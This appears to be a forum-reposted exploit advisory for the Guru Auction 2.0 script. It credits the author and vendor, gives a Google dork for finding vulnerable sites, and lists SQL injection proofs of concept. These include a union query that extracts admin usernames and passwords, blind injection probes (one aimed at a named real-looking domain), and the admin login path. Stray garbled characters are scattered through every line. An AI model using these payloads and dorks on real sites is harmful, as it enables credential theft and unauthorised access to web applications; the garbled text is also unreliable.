Guru Auction 2.0 Multiple SQL Injection Vulnerabilities* z: }! _- U/ v& i
8 W% W: q" M7 D& I9 {% W" @作者 : v3n0m
7 Y8 \+ y. n& S! F应用 : Guru Auction 2.0( p" P! u, n1 s7 p4 d3 g
Price : $49
& {+ s* ~5 k: _! F+ v) P ^Vendor : http://www.guruscript.com/
. x& Y9 n X8 VGoogle Dork : inurl:subcat.php?cate_id=
7 S) S; Q& q( N- n0 t/ `$ G
( j \$ Z, j$ L# s& U, P; \SQLi p0c:
9 v' @( f' U/ l' g1 v! @~~~~~~~~~~' J# ^ \& b0 Z/ {
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
2 |4 }2 q. n' ^! s/ |- J$ G
) p* e" b2 d2 B9 g
! E [5 u/ e6 r! T5 ~1 }1 D3 {1 U盲注 p0c:# `2 c7 k* a; f- K
~~~~~~~~~~
- _+ M. J7 \2 Ghttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
8 K3 L! Y; E+ Vhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false+ |6 h0 b9 @; S$ t5 ]( E
2 Z3 e/ l+ J' `0 t$ a Y+ X管理登录入口:; n, S3 |' N* x. S9 k
~~~~~~~~~~
; t0 _! K: G+ `. j. Xhttp://domain.tld/[path]/admin/- u( s/ C, n* D7 F, h
|
发表于 2012-12-31 09:24:05
收藏
支持
反对